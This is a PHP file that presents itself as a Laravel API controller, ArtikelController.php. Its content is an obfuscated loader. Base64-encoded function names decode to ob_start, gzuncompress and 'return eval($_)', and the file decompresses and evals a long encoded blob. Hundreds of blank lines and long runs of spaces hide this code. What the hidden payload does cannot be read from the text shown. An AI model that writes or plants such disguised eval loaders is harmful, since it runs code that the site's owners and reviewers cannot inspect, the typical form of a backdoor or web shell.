<?php 
        $__='printf';$_='Loading app/Http/Controllers/Api/ArtikelController.php';
        



























































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmltvokAUx99N9jv40IQ2u1HEuq0xPgBbri1bceUyL40zKFCuFbzgp99RiJZts2mz7ibbzG+CZAbOOf9zOMyDodksOXvADKl04cf5nBrspxVDapqmbSnP0zafxPkiCcPZImuzqd9mF7kfzMLjciv10iYfTrOs1WpRg0blvfmpQQYZpxqNXXs2T8jwxQpldfqZbXZ8IN4Mqf3SsZvfRPUKDZsEAoHwMaFQZNCOpSxl0WBsc50oQn9uFcFVuWniXbPcrh9IqQgEAoFAIBAIhP8N8ncGgUAgfFwoOM1mXy8fnBlKnBk1IBUhEAgEAuGPqH9Xwbvp0jY7Iepyns1M3JHFra0bj3YkDo2Y/tKRlBUUNyGKNYSvpd/XiepYWijfCGskbGRH0vH92grGegGZTQYsZVufy1d8bGzBmOMQ9jmWdBrbjYHFrRAT0rCr9KwboXDE8BGKhoDtUkcKXrOZoEhYIgasUNSp9Cj01MxDKOiFbfa2IOoX0DSKnUab2Xioe+ce7qlrcoHl0cDsBajgvkGmR6Oon+H4BR9nqsyzrsxfP6k+xzqRUMgv9bmqf13eJ3EF7OqhjQ/As4G9j6dl4Eem8v7OD7tS/aTyyT4dfU1c+3l9fe4R69jieQf7WiH/8mBzu052ZxdJhg+xrSyCDow0HKe/lIX+fOcHdfXCMTVafUWrIh5ipqUm7qrStj8USU+m1l1+Hx213Y/ruZS50lVO3NoxlWxq3rkgNpZYbwqZS3eK6wksN1FHpd5Zpbu0VUJHMgros4Ejeikq6M8gVjxs60HePawdYo7xdcbAAYNMFnuhU+BewPlMGSMzJMWDsRbh3snxs0zU8dpVmEPeW6UIqvy4Pu/+pnaSlsAuSna1w9pjmde3UDLik+mPwiXA1xCz6YDivXlMYvWtdRcND4ibFEaTk9W+5hPrgpHRrXp3Acxf3kXfTW95Nn5mU9M+HyVDatBo/PtNbrg/n1ezi8F7zJ/ZvsXw7BjwnNr9Ul8OYck3aGT8jW/Q6r13Xmv2svUuBj8BpEL2oA==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































































































                                                                                                                                                                                                                     $________;
